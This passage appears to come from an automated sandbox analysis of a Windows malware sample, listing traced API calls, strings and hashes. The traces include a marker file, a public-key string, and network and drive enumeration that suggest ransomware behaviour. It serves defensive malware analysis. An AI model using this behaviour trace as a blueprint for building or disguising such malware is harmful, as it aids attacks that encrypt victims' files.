                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1678825546-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2964551433-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2964551433-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___unDName.LIBCMT ref: 00BC071B
                                                                                                                                                                        • _strlen.LIBCMT ref: 00BC072E
                                                                                                                                                                        • __lock.LIBCMT ref: 00BC074A
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BC075C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BC076D
                                                                                                                                                                        • _free.LIBCMT ref: 00BC07B6
                                                                                                                                                                          • Part of subcall function 00BB42FD: IsProcessorFeaturePresent.KERNEL32(00000017,00BB42D1,00BB3B69,?,?,00BB0CE9,00BB520D,?,00BB42DE,00000000,00000000,00000000,00000000,00000000,00BB981C), ref: 00BB42FF
                                                                                                                                                                        • _free.LIBCMT ref: 00BC07AF
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704956918-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BA1B1E
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BA1B29
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B4C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BA1B5C
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B6A
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00BA1B72
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BA1B78
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                        • Opcode ID: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction ID: 0cb07de317dcffcf08b9e1cad4acd3065fc147a94c6bae8da69ede8c1afb327c
                                                                                                                                                                        • Opcode Fuzzy Hash: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01D436A41318AADB20A7E98C81FEDB3ACFB08B41F4400A5F700B70D0E670A940CBF5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00BB5141
                                                                                                                                                                          • Part of subcall function 00BB7D6C: EncodePointer.KERNEL32(00000000,?,00BB5146,00BB3FFE,00C97990,00000014), ref: 00BB7D6F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: __initp_misc_winsig.LIBCMT ref: 00BB7D8A
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BC26B3
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BC26C7
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BC26DA
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BC26ED
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BC2700
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BC2713
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BC2726
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BC2739
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BC274C
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BC275F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BC2772
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BC2785
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BC2798
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BC27AB
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BC27BE
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BC27D1
                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00BB5146
                                                                                                                                                                        • __mtterm.LIBCMT ref: 00BB514F
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B62
                                                                                                                                                                          • Part of subcall function 00BB51B7: _free.LIBCMT ref: 00BB8B69
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00C9AC00,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B8B
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5174
                                                                                                                                                                        • __initptd.LIBCMT ref: 00BB5196
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BB519D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                        • Opcode ID: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction ID: e7db26d6b91c73aa4ec8b7bcdf1d3132eccb0b12d980bfa91ab4ef222d73726a
                                                                                                                                                                        • Opcode Fuzzy Hash: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BF09036159B511FE63977B8BC07BFE2AD4EF01730B2106EAF064E51D1EFE0944185A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB594A
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00BB3B69,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • _free.LIBCMT ref: 00BB5970
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5989
                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00BB5998
                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 00BB59B1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB59C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                        • Opcode ID: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction ID: 45d4009dfcc91457d41ad81ed266767d2fe3491bc03d72771fe5fe2afc3e7fd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 18015731502B00EBDE34AB68A846BFD72E4AF10731F2046DAE0A59A0D5CFF49981DA56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00BE07C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                        • Opcode ID: eb8e500594dce08208b09c33b2ac75887143c9e040ace2681cad8bdd98f48584
                                                                                                                                                                        • Instruction ID: cb0d62b3a9f0f35387b5fdb6cd869697745f44e087101bfd881969e2d1a1ee9a
                                                                                                                                                                        • Opcode Fuzzy Hash: eb8e500594dce08208b09c33b2ac75887143c9e040ace2681cad8bdd98f48584
                                                                                                                                                                        • Instruction Fuzzy Hash: AE41C471A043459BD720EE55CC45BAFB3D8EF95348F0008AEF585D3141E7B5ED098BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00C55D3D
                                                                                                                                                                          • Part of subcall function 00BB501F: GetLastError.KERNEL32(?,00BB3B69,00BB520D,00BB0CE9,?,?,00BB3B69,?), ref: 00BB5021
                                                                                                                                                                          • Part of subcall function 00BB501F: __calloc_crt.LIBCMT ref: 00BB5042
                                                                                                                                                                          • Part of subcall function 00BB501F: __initptd.LIBCMT ref: 00BB5064
                                                                                                                                                                          • Part of subcall function 00BB501F: GetCurrentThreadId.KERNEL32 ref: 00BB506B
                                                                                                                                                                          • Part of subcall function 00BB501F: SetLastError.KERNEL32(00000000,00BB3B69,00BB520D,00BB0CE9,?,?,00BB3B69,?), ref: 00BB5083
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00C55D60
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00C55D7E
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00C55DCD
                                                                                                                                                                        Strings
                                                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00C55D48, 00C55D6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                                                        • Opcode ID: b67e50eaf208f9b6d708a007f49b26c22874541cfa5f26044b8b0905114433ab
                                                                                                                                                                        • Instruction ID: b77cf80a6f444ced08a5c3286e03d4aa8bf591b7f1d5f4ea8292c50f53cefb5a
                                                                                                                                                                        • Opcode Fuzzy Hash: b67e50eaf208f9b6d708a007f49b26c22874541cfa5f26044b8b0905114433ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 81112777511E156BEB213A259D15BFB73ECEF007A2F100065FE149A202E761DE8452E9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                                                        • Opcode ID: f9d23dc3a1882f823f8580a1daa0119e31064c56996b7c825ddf7370afe59761
                                                                                                                                                                        • Instruction ID: 7d535ab42806122821ff8f31fed3e56284c3ef4aab8a226f157db3d8ba5a9b63
                                                                                                                                                                        • Opcode Fuzzy Hash: f9d23dc3a1882f823f8580a1daa0119e31064c56996b7c825ddf7370afe59761
                                                                                                                                                                        • Instruction Fuzzy Hash: D0215772A043153BE620A9755C02FBB77D9DFC1B98F044494FF54A72C2EA61ED0942A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C51B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C539
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: 921c90cd205d9bae4ca3f1194e8e003a2b13a92710d4c6ea73507dc8b59ae310
                                                                                                                                                                        • Instruction ID: f151ff7700744b2f6806ed15c7c402b583f24147f224ea039344d6bb9e67df28
                                                                                                                                                                        • Opcode Fuzzy Hash: 921c90cd205d9bae4ca3f1194e8e003a2b13a92710d4c6ea73507dc8b59ae310
                                                                                                                                                                        • Instruction Fuzzy Hash: DA11E7B2A4032833DD2075696C87FEF77DCDB55B21F4100F6FA0CD2142E5A6955542E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00BABABE
                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 00BABAC5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                        • Opcode ID: 7d9cd1e4e993737110df545c54c79712b5db4b7dc1681609e10173efe2aae960
                                                                                                                                                                        • Instruction ID: 8dccd9c90624a1bd25f94071e424aac5596180f5c31e1baf24dd52222bbc3a7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7d9cd1e4e993737110df545c54c79712b5db4b7dc1681609e10173efe2aae960
                                                                                                                                                                        • Instruction Fuzzy Hash: 80E04F356817647BE7315714BC4BFDE3554E702F11F304159FA017E2E0C7E169818A8C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00BA0C12
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00BA0C39
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA0C4C
                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00BA0C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                        • Opcode ID: d4c9f90890a8c63e174444fd78be0a359c13f809a505e95bc46713bfdb07f65d
                                                                                                                                                                        • Instruction ID: f884df3073e0a2773f9ffaba21243a7c00c42d531f07db4521c28df61369c139
                                                                                                                                                                        • Opcode Fuzzy Hash: d4c9f90890a8c63e174444fd78be0a359c13f809a505e95bc46713bfdb07f65d
                                                                                                                                                                        • Instruction Fuzzy Hash: C091E17561C3419FD728EF68C891B6BB7E1FF85714F1489ADF88A87280E770A940CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD1726
                                                                                                                                                                        • _strlen.LIBCMT ref: 00BD1734
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • _strnlen.LIBCMT ref: 00BD17BF
                                                                                                                                                                        • __lock.LIBCMT ref: 00BD17D0
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD17DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                        • Opcode ID: 5545da5c79bed4a77cdd16a22a2e492fd293c0ecdd969c4e75f8694ef6093086
                                                                                                                                                                        • Instruction ID: 96f21b28af747124c3454cde1262dd79e9543e5e195f5fd3320da5485e7d127b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5545da5c79bed4a77cdd16a22a2e492fd293c0ecdd969c4e75f8694ef6093086
                                                                                                                                                                        • Instruction Fuzzy Hash: 11319A71655215BBDB216B6CDC41BEEB6D89F05B20F1409D6F814EB392FFB4CD0086A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00BA0A75
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00C90234,00000002), ref: 00BA0AE2
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00BA0AF9
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BA0B02
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00BA0B1B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
